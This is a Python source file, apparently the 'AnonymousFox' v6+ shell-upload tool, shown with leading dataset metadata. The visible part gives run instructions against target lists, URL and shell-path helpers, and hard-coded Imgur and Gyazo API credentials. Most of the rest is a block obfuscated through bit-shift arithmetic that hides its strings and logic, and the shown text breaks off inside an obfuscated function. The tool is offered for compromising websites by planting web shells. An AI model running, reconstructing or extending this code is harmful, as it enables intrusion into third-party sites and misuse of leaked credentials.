| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 127
| 2
| 72
| 63.5
| 0.907563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1da09581ba1e0dae121b253e9ba6498fa03383a7
| 317,376
|
py
|
Python
|
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#download Python (preferably Python 2.7.14) => https://www.python.org/downloads/release/python-2714/
#install requests, how ? => https://anonymousfox.io/_@info/requests.txt
#install colorama, how ? => https://anonymousfox.io/_@info/colorama.txt
#install selenium, how ? => https://anonymousfox.io/_@info/selenium.txt
#install imgurpython, how ? => https://anonymousfox.io/_@info/imgurpython.txt
#get Chrome Driver, how ? => https://anonymousfox.io/_@info/ChromeDriver.txt
#run by Double Click on v6p.py
#OR run like (Windows) => v6p.py lists.txt
#OR run like (python 2.7) => python v6p.py lists.txt
#OR run like (python 3) => python3 v6p.py lists.txt
# Notice : Be careful not to use any similar script !! Some sons of the bitchs stole the script for the v1 source and v2 source ...
# and they attributed our efforts to them! In order to protect our efforts, we have already encrypted v3 , v4, v5 , v6 and v6+ script,
# and we will disable all previous versions!
def modelsInstaller():
    """Best-effort installer for the third-party packages this script uses.

    Called when the imports below fail. Shells out to pip for each package
    (via the Python 2.7 Scripts dir on py2, `py -m pip` otherwise).

    Fix: the original printed the success message unconditionally, even
    when pip failed; success is now gated on os.system returning 0, and
    the bare `except:` clauses are narrowed to `except Exception` so
    Ctrl-C still interrupts the install loop.
    """
    try:
        models = ['requests', 'colorama', 'mechanize', 'selenium',
                  'imgurpython', 'python-gyazo']
        for model in models:
            try:
                if sys.version_info[0] < 3:
                    status = os.system('cd C:\Python27\Scripts & pip install {}'.format(model))
                else:
                    status = os.system('py -m pip install {}'.format(model))
                if status == 0:
                    print (' ')
                    print (' [+] {} has been installed successfully, Restart the program.'.format(model))
                    print (' ')
                else:
                    print (' [-] Install {} manually.'.format(model))
                    print (' ')
            except Exception:
                print (' [-] Install {} manually.'.format(model))
                print (' ')
    except Exception:
        # Best-effort: a failed install run is ignored; the import retry
        # will surface a clear ImportError if packages remain missing.
        pass
import re, sys, os, random, string, time, ssl, json, socket, base64
from time import time as timer
try :
import requests, mechanize, selenium, imgurpython, gyazo
from colorama import Fore
from colorama import init
except :
modelsInstaller()
# Colour console output: autoreset=True restores the default colour after
# every print, so styles never leak between lines.
init(autoreset=True)
# Silence urllib3 certificate warnings; presumably the HTTP requests made
# elsewhere in this script disable verification — confirm.
requests.packages.urllib3.disable_warnings()
# One-letter foreground-colour aliases used throughout the script.
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA
fy = Fore.YELLOW
fb = Fore.BLUE
def URLdomain_Fox(site):
    """Reduce a URL to its bare domain.

    Drops the leading http/https scheme, removes every 'www.' occurrence,
    and discards everything from the first slash onward.
    """
    for scheme in ("http://", "https://"):
        if site.startswith(scheme):
            site = site.replace(scheme, "")
            break
    if 'www.' in site:
        site = site.replace("www.", "")
    if '/' in site:
        site = site.rstrip().split('/')[0]
    return site
def URL_FOX(site):
    """Return scheme + host for a URL.

    Defaults the scheme to http:// when none is present; any path
    component after the host is discarded.
    """
    prefix = 'http://'
    if site.startswith("https://"):
        prefix = 'https://'
        site = site.replace("https://", "")
    elif site.startswith("http://"):
        site = site.replace("http://", "")
    if '/' in site:
        site = site.rstrip().split('/')[0]
    return prefix + site
def USER_FOX(site):
    """Derive a username-like token from a URL.

    Strips the scheme and any path, removes every 'www.' occurrence, then
    returns the first dot-separated label of what remains.
    """
    for scheme in ("http://", "https://"):
        if site.startswith(scheme):
            site = site.replace(scheme, "")
            break
    host = site.rstrip().split('/')[0]
    if 'www.' in host:
        host = host.replace("www.", "")
    return host.split('.')[0]
def input_Fox(txt):
    """Prompt the user with *txt* and return their reply.

    Python 2 replies are stripped of surrounding whitespace; Python 3
    replies are returned verbatim (the prompt is written manually so the
    display matches raw_input). Returns False if reading fails, e.g. on
    EOF or keyboard interrupt (bare except preserved from the original).
    """
    try:
        if sys.version_info[0] >= 3:
            sys.stdout.write(txt)
            return input()
        return raw_input(txt).strip()
    except:
        return False
def file_get_contents_Fox(filename):
    """PHP-style helper: return the full contents of *filename* as text."""
    handle = open(filename)
    try:
        return handle.read()
    finally:
        handle.close()
def shuffle_Fox(arr):
    """In-place pseudo-shuffle of *arr*; returns the same list.

    Performs len(arr)-1 swaps, each exchanging a randomly chosen element
    with its left neighbour (index -1 wraps to the last element).
    """
    for _ in range(len(arr) - 1):
        idx = random.randint(0, len(arr) - 1)
        arr[idx - 1], arr[idx] = arr[idx], arr[idx - 1]
    return arr
def shellPath_Fox(url, filename, ty):
    """Build the expected URL of an uploaded file.

    ty == 1: substitute *filename* for the last path segment of *url*;
    ty == 2: append *filename* to the site root (via URL_FOX).
    Any query string is discarded first. Returns False for any other *ty*
    or on error (matching the original, whose unbound-variable NameError
    fell into the except clause).
    """
    try:
        if '?' in url:
            url = str(url.split('?')[0])
        if ty == 1:
            return url.replace(str(url.split('/')[-1]), filename)
        if ty == 2:
            return URL_FOX(url) + '/' + filename
        return False
    except:
        return False
def random_Fox(length):
    """Return a random string of *length* ASCII lowercase letters."""
    chars = [random.choice(string.ascii_lowercase) for _ in range(length)]
    return ''.join(chars)
def imgur_Fox(path):
    # Upload 'screenshots/<path>' to Imgur anonymously and return the image
    # URL, or False on any failure (missing library, network error, parse
    # failure).
    try:
        from imgurpython import ImgurClient
        # NOTE(review): hard-coded API credentials shipped with the script.
        client_id = '397c46443e4a952'
        client_secret = '0033c37d22a540a195b8b3df1cfd725db1076401'
        client_Fox = ImgurClient(client_id, client_secret)
        items_Fox = client_Fox.upload_from_path('screenshots/'+path, config=None, anon=True)
        # The link is scraped from the repr of the upload result; the repr of
        # string values differs between Python 2 (u'...') and Python 3 ('...'),
        # hence the two regexes.
        if (sys.version_info[0] < 3):
            urlpng_Fox = re.findall(re.compile('u\'link\': u\'(.*)\','), str(items_Fox))[0]
        else :
            urlpng_Fox = re.findall(re.compile('\'link\': \'(.*)\','), str(items_Fox))[0]
        # Greedy match may capture past the closing quote; keep only the URL.
        if ("'" in urlpng_Fox) :
            urlpng_Fox = urlpng_Fox.split("'")[0]
        return urlpng_Fox
    except:
        return False
def gyazo_Fox(path):
    # Upload 'screenshots/<path>' to Gyazo and return the .png URL, or False
    # on failure (the error hint suggests rate limiting / IP blocking).
    try :
        from gyazo import Api
        # NOTE(review): hard-coded access token shipped with the script.
        client_Fox = Api(access_token='1t00j2_Qx6Y3HYNhteW5HvTc0ks9Xxjoc0Rjqoxk1t0')
        with open('screenshots/'+path, 'rb') as fox:
            image_Fox = client_Fox.upload_image(fox)
        # Scrape the URL out of the JSON repr and re-append the stripped
        # '.png' suffix that the capture group excludes.
        urlpng_Fox = re.findall(re.compile('"url": "(.*)\.png"'), str(image_Fox.to_json()))[0] + '.png'
        return urlpng_Fox
    except :
        print('\n [!] Error, You have to change your IP by VPN.\n')
        return False
def content_Fox(req):
    """Return the body of a response-like object as a str.

    Tries several content/text accessors in an interpreter-appropriate
    order, falling through to the next on any failure — mirroring the
    differing bytes/str semantics of Python 2 and 3. The final fallback
    can only fail by raising, as in the original.
    """
    if sys.version_info[0] < 3:
        attempts = (
            lambda: str(req.content),
            lambda: str(req.content.encode('utf-8')),
            lambda: str(req.content.decode('utf-8')),
        )
        last_resort = lambda: str(req.text)
    else:
        attempts = (
            lambda: str(req.content.decode('utf-8')),
            lambda: str(req.content.encode('utf-8')),
            lambda: str(req.text),
        )
        last_resort = lambda: str(req.content)
    for attempt in attempts:
        try:
            return attempt()
        except:
            continue
    return last_resort()
def getError(ty):
    """Print a fatal error hint and terminate the program.

    ty == 1 reports a likely connectivity problem (two hints); any other
    value suggests only rotating the IP/RDP. Always appends the report
    contact line and exits with status 0.
    """
    if ty == 1:
        hints = [
            ' [-] {}Make sure you are connected to the internet.'.format(fr),
            ' [-] {}OR You must to change your IP/RDP.'.format(fr),
        ]
    else:
        hints = [' [-] {}You must to change your IP/RDP.'.format(fr)]
    hints.append(' [!] Or Do a report for AnonymousFox, Telegram: {}@Anonymous_F0x\n'.format(fc))
    for line in hints:
        print(line)
    exit(0)
_vsqmdgoqxczl=((()==[])+(()==[]));__btvtxbozjofb=(_vsqmdgoqxczl**_vsqmdgoqxczl);___tphcagehraku=((__btvtxbozjofb<<__btvtxbozjofb));____nthikhotjssa=((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)));_____chsqpefvmbxg=((__btvtxbozjofb<<____nthikhotjssa));______ttwxoebqsbsu=((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)));_______tvhkobpbumlt=str("".join(chr(__RSV) for __RSV in [((____nthikhotjssa<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(_____chsqpefvmbxg<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(______ttwxoebqsbsu<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqx
czl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+__
____ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu),(_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<___
_nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))]));________tpudpazdftcn=str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthi
khotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]));_________ocrgugcogovp=str("".join(chr(__RSV) for __RSV in 
[(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nt
hikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))
def __________xrwpikstqlrz():
try :
global ___________onielzvjdokg
global ____________gwbahwaesaqz
